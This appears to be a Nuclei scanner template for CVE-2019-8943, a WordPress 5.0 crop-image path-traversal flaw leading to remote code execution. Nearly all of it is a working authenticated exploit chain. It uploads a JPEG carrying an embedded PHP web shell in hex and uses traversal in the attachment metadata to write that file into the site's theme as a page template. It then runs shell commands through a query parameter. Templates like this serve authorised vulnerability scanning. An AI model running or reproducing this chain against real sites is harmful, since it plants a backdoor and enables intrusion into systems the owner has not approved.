314 lines
10 KiB
YAML
314 lines
10 KiB
YAML
id: CVE-2019-8943
|
|
|
|
info:
|
|
name: WordPress Core 5.0.0 - Crop-image Shell Upload
|
|
author: sttlr
|
|
severity: medium
|
|
description: |
|
|
WordPress through 5.0.3 allows Path Traversal in wp_crop_image(). An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring.
|
|
reference:
|
|
- https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
|
|
- http://packetstormsecurity.com/files/152396/WordPress-5.0.0-crop-image-Shell-Upload.html
|
|
- http://packetstormsecurity.com/files/161213/WordPress-5.0.0-Remote-Code-Execution.html
|
|
- http://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce
|
|
- https://tryhackme.com/r/room/blog
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
|
|
cvss-score: 6.5
|
|
cve-id: CVE-2019-8943
|
|
cwe-id: CWE-22
|
|
epss-score: 0.92778
|
|
epss-percentile: 0.99097
|
|
cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
vendor: wordpress
|
|
product: wordpress
|
|
shodan-query:
|
|
- http.component:"wordpress"
|
|
- cpe:"cpe:2.3:a:wordpress:wordpress"
|
|
fofa-query: body="oembed" && body="wp-"
|
|
tags: cve,cve2019,wordpress,rce,intrusive,authenticated,packetstorm,wp-theme
|
|
|
|
variables:
|
|
image_filename: "{{rand_text_alpha(10)}}"
|
|
string: "{{to_lower(rand_text_alpha(5))}}"
|
|
|
|
flow: http(1) && http(2) && (http(3) || http(4)) && http(5) && http(6) && http(7) && http(8) && http(9) && http(10) && http(11) && http(12) && http(13) && http(14) && http(15) && http(16)
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "WordPress</title>"
|
|
- '/wp-login.php?action=lostpassword">Lost your password?</a>'
|
|
- '<form name="loginform" id="loginform" action="{{BaseURL}}/wp-login.php" method="post">'
|
|
condition: or
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Login
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains_all(header,"wordpress_logged_in","/wp-admin")'
|
|
- 'status_code == 302'
|
|
condition: and
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
GET /wp-content/themes/{{theme_name}}/style.css HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "status_code == 200"
|
|
- "len(body) > 0"
|
|
- "content_type == 'text/css'"
|
|
condition: and
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: theme_name
|
|
group: 1
|
|
regex:
|
|
- "/wp-content/themes/([^/]+)/"
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
GET /wp-admin/media-new.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
extractors:
|
|
- type: xpath
|
|
name: wpnonce
|
|
attribute: value
|
|
xpath:
|
|
- "//input[@id='_wpnonce'][1]"
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/async-upload.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=rexvfybxrhgfrfrjv
|
|
|
|
--rexvfybxrhgfrfrjv
|
|
Content-Disposition: form-data; name="name"
|
|
|
|
{{image_filename}}.jpg
|
|
--rexvfybxrhgfrfrjv
|
|
Content-Disposition: form-data; name="action"
|
|
|
|
upload-attachment
|
|
--rexvfybxrhgfrfrjv
|
|
Content-Disposition: form-data; name="_wpnonce"
|
|
|
|
{{wpnonce}}
|
|
--rexvfybxrhgfrfrjv
|
|
Content-Disposition: form-data; name="async-upload"; filename="{{image_filename}}.jpg"
|
|
Content-Type: image/jpeg
|
|
|
|
{{hex_decode("ffd8ffe000104a46494600010101006000600000ffed003850686f746f73686f7020332e30003842494d040400000000001c1c027400103c3f3d60245f4745545b305d603b3f3e1c020000020004fffe003b43524541544f523a2067642d6a7065672076312e3020287573696e6720494a47204a50454720763830292c207175616c697479203d2038320affdb0043000604040504040605050506060607090e0909080809120d0d0a0e1512161615121414171a211c17181f1914141d271d1f2223252525161c292c28242b21242524ffdb00430106060609080911090911241814182424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424ffc000110800c0010603012200021101031101ffc4001f0000010501010101010100000000000000000102030405060708090a0bffc400b5100002010303020403050504040000017d01020300041105122131410613516107227114328191a1082342b1c11552d1f02433627282090a161718191a25262728292a3435363738393a434445464748494a535455565758595a636465666768696a737475767778797a838485868788898a92939495969798999aa2a3a4a5a6a7a8a9aab2b3b4b5b6b7b8b9bac2c3c4c5c6c7c8c9cad2d3d4d5d6d7d8d9dae1e2e3e4e5e6e7e8e9eaf1f2f3f4f5f6f7f8f9faffc4001f0100030101010101010101010000000000000102030405060708090a0bffc400b51100020102040403040705040400010277000102031104052131061241510761711322328108144291a1b1c109233352f0156272d10a162434e125f11718191a262728292a35363738393a434445464748494a535455565758595a636465666768696a737475767778797a82838485868788898a92939495969798999aa2a3a4a5a6a7a8a9aab2b3b4b5b6b7b8b9bac2c3c4c5c6c7c8c9cad2d3d4d5d6d7d8d9dae2e3e4e5e6e7e8e9eaf2f3f4f5f6f7f8f9faffda000c03010002110311003f003c3f3d60245f4745545b305d603b3f3e")}}
|
|
--rexvfybxrhgfrfrjv--
|
|
|
|
extractors:
|
|
- type: json
|
|
part: body
|
|
name: image_id
|
|
json:
|
|
- ".data.id"
|
|
internal: true
|
|
|
|
- type: json
|
|
part: body
|
|
name: update_nonce
|
|
json:
|
|
- ".data.nonces.update"
|
|
internal: true
|
|
|
|
- type: json
|
|
part: body
|
|
name: filename
|
|
json:
|
|
- ".data.filename"
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
action=query-attachments&post_id=0&query%5bitem%5d=43&query%5borderby%5d=date&query%5border%5d=DESC&query%5bposts_per_page%5d=40&query%5bpaged%5d=1
|
|
|
|
extractors:
|
|
- type: json
|
|
part: body
|
|
name: ajax_nonce
|
|
json:
|
|
- ".data[0].nonces.edit"
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
action=image-editor&_ajax_nonce={{ajax_nonce}}&postid={{image_id}}&history=%5b%7b%22c%22%3a%7b%22x%22%3a0%2c%22y%22%3a0%2c%22w%22%3a400%2c%22h%22%3a300%7d%7d%5d&target=all&context=&do=save
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: image_filename
|
|
part: body
|
|
group: 1
|
|
regex:
|
|
- '\/([^\/]+-e\d+)-'
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/post.php?post={{image_id}}&action=edit HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
extractors:
|
|
- type: xpath
|
|
name: wpnonce2
|
|
attribute: value
|
|
xpath:
|
|
- "//input[@id='_wpnonce'][1]"
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/post.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
_wpnonce={{wpnonce2}}&action=editpost&post_ID={{image_id}}&meta_input%5b_wp_attached_file%5d={{date_time('%Y/%M')}}/{{image_filename}}.jpg%3f/x
|
|
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 302
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
action=crop-image&_ajax_nonce={{ajax_nonce}}&id={{image_id}}&cropDetails%5bx1%5d=0&cropDetails%5by1%5d=0&cropDetails%5bwidth%5d=400&cropDetails%5bheight%5d=300&cropDetails%5bdst_width%5d=400&cropDetails%5bdst_height%5d=300
|
|
|
|
extractors:
|
|
- type: json
|
|
part: body
|
|
json:
|
|
- ".data.filename"
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/post.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
_wpnonce={{wpnonce2}}&action=editpost&post_ID={{image_id}}&meta_input%5b_wp_attached_file%5d={{date_time('%Y/%M')}}/{{image_filename}}.jpg%3f/../../../../themes/{{theme_name}}/{{randstr}}
|
|
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 302
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
action=crop-image&_ajax_nonce={{ajax_nonce}}&id={{image_id}}&cropDetails%5bx1%5d=0&cropDetails%5by1%5d=0&cropDetails%5bwidth%5d=400&cropDetails%5bheight%5d=300&cropDetails%5bdst_width%5d=400&cropDetails%5bdst_height%5d=300
|
|
|
|
extractors:
|
|
- type: json
|
|
part: body
|
|
name: cropped_image_filename
|
|
json:
|
|
- ".data.filename"
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/post-new.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
extractors:
|
|
- type: xpath
|
|
name: wpnonce3
|
|
attribute: value
|
|
xpath:
|
|
- "//input[@id='_wpnonce'][1]"
|
|
internal: true
|
|
|
|
- type: regex
|
|
name: post_id
|
|
part: body
|
|
group: 1
|
|
regex:
|
|
- '"post":{"id":(\w+),'
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/post.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
_wpnonce={{wpnonce3}}&action=editpost&post_ID={{post_id}}&post_title={{rand_text_alpha(10)}}&post_name={{rand_text_alpha(10)}}&meta_input%5b_wp_page_template%5d=cropped-{{randstr}}.jpg
|
|
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 302
|
|
internal: true
|
|
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/?p={{post_id}}&0=echo+{{base64(string)}}|base64+-d"
|
|
- "{{BaseURL}}/?p={{post_id}}&0=type+C:\\windows\\win.ini"
|
|
- "{{BaseURL}}/?p={{post_id}}&0=type+..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini"
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "{{string}}"
|
|
- "for 16-bit app support"
|
|
condition: or
|
|
# digest: 4a0a00473045022100e9db47e994dd66ff6b2e79bac165e00a988426661e2a65a7fe5a33176d26b54a02206a694c28360feac6581fa6ac03dc8bc1fd55a22e116e72e6f234a2f8104ff1b5:922c64590222798bb761d5b6d8e72950 |